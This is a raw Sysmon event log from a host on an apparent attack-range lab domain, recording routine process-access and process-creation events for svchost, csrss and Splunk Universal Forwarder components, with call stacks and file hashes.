10341000x80000000000000003267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.388{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 